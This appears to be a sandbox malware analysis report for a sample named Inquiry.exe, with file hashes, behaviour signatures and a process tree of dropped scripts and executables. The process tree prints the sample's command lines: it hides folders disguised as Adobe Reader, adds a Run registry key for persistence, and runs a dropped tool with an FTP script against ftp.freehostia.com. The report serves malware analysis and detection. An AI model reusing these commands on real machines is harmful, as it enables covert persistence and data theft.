Overview

overview

10

Static

static

3

Inquiry.exe

windows7-x64

8

Inquiry.exe

windows10-2004-x64

Analysis

  • max time kernel
    2s
  • max time network
    1s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27-05-2024 19:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Inquiry.exe

  • Size

    2.3MB

  • MD5

    7bf8e2064a035d6d6162a5c8f616812c

  • SHA1

    402d7116983dd6d79f3eeeb3c3f6ad116ffa5669

  • SHA256

    5a1232280d7c0f8298f4d1f33eeaac6ebe4deea654b14367e779a0a7e7ebce8f

  • SHA512

    96b235bfcc9651ed50cd7aba365a3bc819434b144ba3eb982a3920db45d5d5d7d53c31e205944f42af9129986b41b57ad128ea5e3d9cc66898a68aebe0805fc8

  • SSDEEP

    49152:Iggs8ABpNAcbBicST5ZlL9/5ga/sKvnP+BQzeEbUJJk8Lq1v2BvA78:IVs8AvNzsl12j20EJGqN2mI

Score
8/10
evasionpersistence

Malware Config

Signatures

  • Sets file to hidden 1 TTPs 5 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Inquiry.exe
    "C:\Users\Admin\AppData\Local\Temp\Inquiry.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1896
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
          4⤵
          • Enumerates system info in registry
          PID:888
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1516
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1468
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:300
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1528
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2144
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2676
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
            5⤵
            • Loads dropped DLL
            PID:2284
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
              Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
              6⤵
              • Executes dropped EXE
              PID:1168
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro3.bat"
              6⤵
              • Adds Run key to start application
              PID:2032
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              6⤵
              • Gathers network information
              PID:840
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
              adbr01.exe -f "011.011"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1840
              • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
                adbr01.exe -f "011.011"
                7⤵
                • Executes dropped EXE
                PID:2200
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
    1⤵
    • Suspicious use of FindShellTrayWindow
    PID:2440

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
    Filesize

    118B

    MD5

    c69fb6b170a6abfb965777713ff229c1

    SHA1

    d43a2aa2d68a7a18453ea197a679be7763af859c

    SHA256

    bd703a3de33ffa87e8df571b0365ef6cda20a45b20c8825c2edc2a7a227aeb19

    SHA512

    4a207ac8829e6ba22f4914575c9ce3c0fe7792cd0720bab9717d04008b72c84fb6422ad3106f2f52fa4e3b21a5e697a347ec11558f2b18955e4312002bc8abfe

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
    Filesize

    124KB

    MD5

    1a1075e5e307f3a4b8527110a51ce827

    SHA1

    f453838ed21020b7ca059244feea8579e5aa74ef

    SHA256

    ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5

    SHA512

    b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
    Filesize

    560B

    MD5

    481435bcf75055098596cd7eae7a04bd

    SHA1

    3089a8aebb1a199d886fddb1a416903a1172d4b3

    SHA256

    261a0c0c76fb08f6b57aaad7fce12c485e00a5ecaac401dc10cb25d225bd8363

    SHA512

    a1174877296c771f13c726576650024bb63d845bb6b6654994cea387d9b4dddff09167e24e596e0d44424997ec422a456c9366ec998b5dcce5d1b5540ee5f7b8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
    Filesize

    186B

    MD5

    09082253605a7171f078e26dc308a667

    SHA1

    585286c9fcda5e66e7fdb4e17a7bab6160183d46

    SHA256

    f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed

    SHA512

    adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
    Filesize

    189B

    MD5

    ce8041824149d8266dbb0ad9688224d7

    SHA1

    3ab653c43ce66681ceaab90193e1a4c95d998090

    SHA256

    0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5

    SHA512

    e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
    Filesize

    256KB

    MD5

    97b8dbcc7b3cc290aef4241df911ac2e

    SHA1

    733ababbcd278821d4e3ee78580841981f26642e

    SHA256

    c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023

    SHA512

    4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro3.bat
    Filesize

    140B

    MD5

    6f94e6edb06f44229e66f7a3d1ae0966

    SHA1

    997b74fa1beb2791f98177457636d9ce9b30ed4f

    SHA256

    4a4ba15d7a91c61de1cee9d00bd9db6f6d7e63e920dd2833878a46ea57b03f1b

    SHA512

    a2a3d2aa0176e76d46f8a79370ed588ab74b3fb4ca931a6f71e0c34f4561531d62f4da89284ac8cf42ce2e29b18dcc4f7c4d56625e93d2a6e64c082887c6350f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
    Filesize

    2.1MB

    MD5

    31b2af509754d527a4c2a5cc1b2ad970

    SHA1

    cc737999c1dfeab2dcbe4178118281ff7757db2d

    SHA256

    8d464baad77e60770bacd2d33f7344d08a34a3b3c63a361f9e61f8fec7bef6e9

    SHA512

    a6f1d4daecc61efe555e51a56147a04dfd4dbe4be00a110d4a7cf5f1b3edd17ac5f063a3b3dd9708cde01b8dc04c1526b226186870317746f8899388b6961c8d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
    Filesize

    2.1MB

    MD5

    b7884b9cd90c13f6b55c43404d893237

    SHA1

    ccf856935b6c9d248e39b0885c641b803b4c7f1f

    SHA256

    0fdc310a86ecb105cb056774c78f1699fedd764782bf45a011161544f4857ac8

    SHA512

    7dddf3d655a581d57c70c8954308ea1a0a536b04cb1902ea53bc021429b0d81ed36ded4c39c297a17cfd8f33095be581a00f71a23a67c625d0212851d11d1dc1

    Download Submit

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
    Filesize

    1KB

    MD5

    ccf4c9a64c1fbf3818b0ca8f0644de4f

    SHA1

    5ff1fd81f9170ed5d3a59487e11cc96560d579bc

    SHA256

    622015abe90dd6b324a4d7b1034165d47f93a5d0572263a9eb067b0e374ee278

    SHA512

    14b2e6877c215f771ecc38028ec94eb4bfe441093e527184be390e1f9829e2c943c80c86d6bd5f605bbbfc2f5cccaf908959a98184982c76dbc1ca4e946df6c0

    Download Submit

  • memory/1840-127-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/1840-131-0x00000000024A0000-0x0000000002754000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2200-137-0x00000000028A0000-0x0000000002AAC000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2200-132-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2200-134-0x00000000028A0000-0x0000000002AAC000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2200-144-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2200-145-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2200-147-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2200-146-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2200-148-0x00000000028A0000-0x0000000002AAC000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2284-128-0x0000000002580000-0x0000000002834000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2284-126-0x0000000002580000-0x0000000002834000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/2440-74-0x00000000001C0000-0x00000000001C2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2492-73-0x0000000000500000-0x0000000000502000-memory.dmp

    Filesize

    8KB

    Download